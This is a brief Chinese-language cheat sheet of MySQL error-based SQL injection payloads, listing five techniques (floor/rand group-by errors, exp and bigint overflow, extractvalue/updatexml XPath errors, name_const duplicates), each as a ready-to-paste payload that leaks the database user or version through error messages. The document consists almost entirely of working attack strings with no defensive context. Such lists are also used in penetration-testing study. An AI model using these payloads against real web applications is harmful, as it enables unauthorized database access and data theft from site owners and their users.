1.报错注入
payload: union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a %23
2.利用double数值类型超出范围进行报错注入
payload: union select (exp(~(select * from (select user())a))),2,3 %23
3.利用bigint 溢出进行报错注入
payload:union select (!(select * from (select user())x) - ~0),2,3%23
4.利用xpath 函数报错注入
payload: and extractvalue(1,concat(0x7e,(select @@version),0x7e))%23
payload: and updatexml(1,concat(0x7e,(select @@version),0x7e),1)%23
5.利用数据的重复性
payload: union select 1,2,3 from (select name_const(version(),1), name_const(version(),1))x %23
